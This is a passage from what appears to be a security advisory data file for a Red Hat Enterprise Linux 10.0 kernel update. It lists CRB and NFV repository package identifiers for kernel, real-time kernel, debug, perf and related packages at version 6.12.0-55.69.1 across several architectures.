"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
